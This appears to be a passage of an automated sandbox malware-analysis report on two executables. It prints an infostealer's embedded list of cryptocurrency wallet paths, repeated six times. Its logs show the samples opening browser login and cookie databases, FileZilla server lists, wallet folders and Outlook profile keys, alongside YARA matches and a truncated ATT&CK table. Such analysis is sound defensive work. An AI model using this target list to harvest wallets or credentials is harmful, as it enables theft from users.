                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 37664d9843.exe, 00000004.00000002.1962741464.0000000002041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: 586ef238b2.exe, 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\*.*
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-walJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shmJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-walJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\37664d9843.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                        Source: C:\Users\user\AppData\Local\Temp\1000006001\586ef238b2.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                        Source: Yara matchFile source: Process Memory Space: 37664d9843.exe PID: 8076, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 586ef238b2.exe PID: 7592, type: MEMORYSTR

                        Remote Access Functionality

                        barindex
                        Source: Yara matchFile source: 15.2.586ef238b2.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.37664d9843.exe.ce0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3328030922.0000000000201000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3332366463.0000000001745000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000004.00000002.1962741464.0000000001EDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 37664d9843.exe PID: 8076, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 586ef238b2.exe PID: 7592, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 15.2.586ef238b2.exe.200000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.2.37664d9843.exe.ce0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000004.00000002.1957654994.0000000000CE1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000F.00000002.3328030922.0000000000201000.00000040.00000001.01000000.0000000F.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 37664d9843.exe PID: 8076, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: 586ef238b2.exe PID: 7592, type: MEMORYSTR
                        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                        Command and Scripting Interpreter
                        1
                        Scheduled Task/Job
                        12
                        Process Injection
                        11
                        Masquerading
                        2
                        OS Credential Dumping
                        1
                        System Time Discovery
                        Remote Services1
                        Email Collection
                        2
                        Encrypted Channel
                        Exfiltration Over Other Network MediumAbuse Accessibility Features
                        CredentialsDomainsDefault Accounts1
                        Scheduled Task/Job
                        1
                        DLL Side-Loading
                        1
                        Scheduled Task/Job
                        251
                        Virtualization/Sandbox Evasion
                        LSASS Memory761
                        Security Software Discovery
                        Remote Desktop Protocol1
                        Archive Collected Data
                        12
                        Ingress Tool Transfer
                        Exfiltration Over BluetoothNetwork Denial of Service
                        Email AddressesDNS ServerDomain Accounts1
                        Native API
                        Logon Script (Windows)1
